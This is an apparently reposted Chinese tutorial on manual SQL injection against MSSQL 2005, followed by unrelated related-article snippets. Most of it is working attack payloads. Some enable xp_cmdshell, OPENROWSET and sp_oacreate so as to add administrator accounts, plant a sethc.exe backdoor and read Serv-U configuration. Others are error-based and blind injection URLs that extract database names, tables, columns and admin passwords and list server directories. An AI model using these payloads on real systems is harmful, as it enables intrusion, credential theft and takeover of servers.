2. 程式人生 > >MSSQL2005 手工盲注詳解

MSSQL2005 手工盲注詳解

阿新 發佈:2018-12-18

MSSQL2005 手工盲注詳解

一.開啟擴充套件

1.開啟xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

2.開啟’OPENROWSET’

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

查詢分析器裡執行

;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')

來利用沙盤來新增管理員

3.開啟’sp_oacreate’

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

拷貝檔案d:/windows/explorer.exe 至sethc.exe

declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe' ,'c:/sethc.exe';

在查詢分析器裡執行

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'

這段程式碼就是利用SP_OAcreate來新增一個xcode的系統使用者 然後直接提升為管理員許可權

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

這段程式碼就可以把ServUDaemon.ini裡的配置資訊全部顯示出來

二.有顯錯,暴。

and 0<(select count(*) from master.dbo.sysdatabases);--

折半法得到資料庫個數

and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

依次提交 dbid = 2.3.4… 得到更多的資料庫名

and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--

折半法得到表個數(假設暴出庫名employ)

and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--

爆出一個表名

假設暴出表名為"employ_qj"則在上面語句上加條件 and name not in (‘employ_qj’ 以此一直加條件…

and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--

爆出一個列名

假設暴出欄位名為"id"則在上面語句上加上條件 and name not is(‘id’) 以此一直加條件…

或者

爆庫語句

and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

爆表語句,somedb部份是所要列的資料庫

and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

爆欄位語句,爆表admin裡user='admin’的密碼段

And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--

三.無顯錯,盲注。

先說下SQL2005中的查詢方法

select * from master.dbo.sysdatabases                --查詢資料庫

select * from NetBook.dbo.sysobjects where xtype='u'    --

查詢資料庫NetBook裡的表

select * from NetBook.dbo.syscolumns where id=object_id('book') --

查詢book表裡的欄位

判斷許可權:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))

盲注常規步驟:

判斷庫是否確實為MSSQL2005:

http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

猜資料庫名:

先猜dbid:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1

根據dbid猜庫名,先猜出長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1

再逐位猜:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

猜表名(假設庫名已經猜出為database):

可以嘗試先看有沒管理表:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1

猜第一個,先長度:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1

猜第一個表名,逐位猜:http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1 猜第二個表名(假設第一個為table1): http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1 ...

猜欄位(假設表名已經猜出為table):

猜第一個欄位:

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二個(假設第一個為column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1

猜資料(假設要猜的欄位為name):

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1

四.其他一些語句(列目錄)

1.檢視驅動器

建表p(i為自動編號,a記錄碟符類似"c:/",b記錄可用位元組,其它省略)

;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

;insert p exec xp_availablemedia;--

列出所有驅動器並插入表p

and (select count(*) from p)>3;--折半法查出驅動器總數

and ascii(substring((select a from p where i=1),1,1))=67;--

折半法查出驅動器名(注asc©=67)
上面一般用於無顯錯情況下使用-------以此類推,得到所有驅動器名

and (select a from p where i=1)>3;--

報錯得到第一個驅動器名
上面一般用於顯錯情況下使用-------以此類推,得到所有驅動器名

;drop table p;--

刪除表p

2.檢視目錄

;create table pa(m nvarchar(255),i nvarchar(255));--

建表pa(m記錄目錄,i記錄深度)/

;insert pa exec xp_dirtree 'e:';--列出驅動器e並插入表pa

and (select count(*) from pa where i>0)>-1;--折半法查出i深度

and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--

報錯得到深度i=1的第一個目錄名
上面一般用顯錯且目錄名不為數字情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--

折半法查出深度i=1的第一個目錄名的長度

and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--

折半法查出深度i=1的第一個目錄名的第一個字元長度
上面一般用無顯錯情況下使用-------(得到第二個目錄把"top 0"換為"top 1",換深度只換i就行)以此類推,得到e盤的所有目錄

;drop table pa;--

刪除表pa

經過上面的方法就可得到伺服器所有目錄(這裡為連線使用者有讀取許可權目錄)

相關推薦

MSSQL2005 手工

MSSQL2005 手工盲注詳解 一.開啟擴充套件 1.開啟xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONF

sql注入基於布林/時間的

                本來想自己總結寫一篇的,發現有篇寫的很好,轉載mark一個~原文連結:http://www.jb51.net/article/93445.htm基於布林的盲注Web的頁面的僅僅會返回True和False。那麼布林盲注就是進行SQL注入之後然後根據頁面返回的True或者是Fals

oracle官方文件-手工建庫

Creating a Database with the CREATE DATABASE Statement Using the CREATE DATBASE SQL statement is a more manual approach to creating a

SQL手工注入基礎----MSSQL篇

作者:DragonEgg資訊來源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/     一:注入點的判斷     當我們在URL後特殊字元或語句,使其報錯時,若在返回的資訊中有類似“[Microsoft][OD

暑期練習web23:sqli lab第五關 雙注入GET單引號字元型注入----基於bool型的手工

如果所查詢的使用者id在資料庫中,可以發現頁面顯示”You are in”,而不像前4關那樣會顯示出具體的賬號密碼 而如果輸入的查詢語句不存在,則什麼也不會返回 這裡普及一下盲注時的常用函式 1.mid()函式 mid(striing,start

Sql注入系列(一)---基於時間差的

Sql 基於時間的盲注 基於的原理是,當對資料庫進行查詢操作,如果查詢的條件不存在,語句執行的時間便是0.但往往語句執行的速度非常快,執行緒資訊一閃而過,得到的執行時間基本為0. 例如: 於是sleep(N)這個語句在這種情況下起到了非常大的作用。  Select s

koa2+webpack4+React+pm2純手工架子搭建,SSR專案入門教程以及流程指引:手把手教你實現服務端首屏渲染SSR專案

本人全職喵姐,兼職程式設計師,才疏學淺,大神如果有好的idea能指點迷津的話感激不盡。以下專案為純手工搭建的Webpack4+React+KOA2+PM2前端豆腐渣工程,房子的簡陋模型,入門教程以及流程指引。後續要精裝修還是蓋茅草屋看你自己了……/微微笑(自帶表情包)……先學習…...

十幾分鍾讓你學會MySQL布林和延遲手工操作

作者:Max老白Gān丶 連結:http://www.lofter.com/lpost/1fefbc76_12d25dc31 來源:LOFTER 注入常用到的幾個函式     1 m

Android Dagger2依賴入庫使用

導語    依賴注入是一種面向物件的程式設計模式,它的出現是為了降低耦合性。可能有的人覺得之前並沒有使用過依賴注入,其實當我們在類的建構函式中通過引數引入物件或通過set方法設定類的物件時,就是依賴注入。而通過註解的方式完成的依賴注入就是本篇要講的Dagger庫的使用。新增依

java Io 流類

修改 文件目錄 != exe [] 深入 clas one fileinput 關於java 流類的復習;習慣性的復習按照圖結構一層層往下深入去了解去復習,最後通過代碼來實現感覺印象會更深刻一些; 關於 I/O流:IO可以理解為JAVA用來傳遞數據的管道

cookie 和session 的區別

重復 處理方式 一行 所有 有效 依據 是把 存儲 一個 二者的定義: 當你在瀏覽網站的時候,WEB 服務器會先送一小小資料放在你的計算機上,Cookie 會幫你在網站上所打的文字或是一些選擇, 都紀錄下來。當下次你再光臨同一個網站,WEB 服務器會先看看有沒有它上次留下的

cd命令使用

表示 如果 用戶家目錄 roo 環境變量 方法 字符 實用 效果   cd命令是目錄切換命令,是shell內置命令。   語法:     cd [-L|-P] [dir]   選項:     -p 如果要切換到的目標目錄是一個符號連接,直接切換到符號連接指向的目標目錄   

setting.xml 配置

校驗 找不到 順序 裁剪 全局 -- mls leg 觸發 文件存放位置 全局配置: ${M2_HOME}/conf/settings.xml 用戶配置: ${user.home}/.m2/settings.xml note:用戶配置優先於全局配置。${user.home}

R數據可視化----ggplot2之標度、坐標軸和圖例

abs 調整 所有 不同的 size n) 默認 表達 idt 標度控制著數據到圖形屬性的映射,當有需要時,ggplot2會自動添加一個默認的標度。我們確實可以在不了解標度運行原理的情況下畫出許多圖形,但理解標度並學會如何操縱它們則將賦予我們對圖形更強的控制能力。 每一種圖

跨域資源共享CORS

附加 accep 不發送 地址 code 克服 通信 數據 ror 簡介 CORS是一個W3C標準,全稱是"跨域資源共享"(Cross-origin resource sharing)。 它允許瀏覽器向跨源服務器,發出XMLHttpRequest請求,從而克服了AJAX

磁盤陣列 RAID 技術原理

十分 單獨 很好 不同的 raid1 miss 和數 會同 帶寬 RAID一頁通整理所有RAID技術、原理並配合相應RAID圖解,給所有存儲新人提供一個迅速學習、理解RAID技術的網上資源庫,本文將持續更新,歡迎大家補充及投稿。中國存儲網一如既往為廣大存儲界朋友提供免費、精

Web.Config文件

htm 用法 名稱 href 會話狀態 行為 cookie 程序配置 會話 一).Web.Config是以XML文件規範存儲,配置文件分為以下格式 1.配置節處理程序聲明 特點: 位於配置文件的頂部,包含在<configSections>標誌中。

oracle recyclebin

tables 執行 reat 手工 emp 命令 沒有 -- 釋放 今天在SOA應用數據庫上運用DBMS_REDEFITION包進行在線非分區表轉換分區表操作時,本想DROP掉建的臨時表cube_scope_temp不小心後面忘記加"temp"直接執行了,我等意識到這個問題

POI操作Excel,讀取xls和xlsx格式的文件

shee xss split 類型 後綴 .sh lan xls lin package org.ian.webutil; import java.io.File; import java.io.FileInputStream; import java.io.FileN

java.util包(二)——Connection接口

操作 相同 元素 叠代 cat roo soft true nbsp Connection接口介紹   Connection接口是java集合的root接口,沒有實現類,只有子接口和實現子接口的各種容器。主要用來表示java集合這一大的抽象概念。   Connection接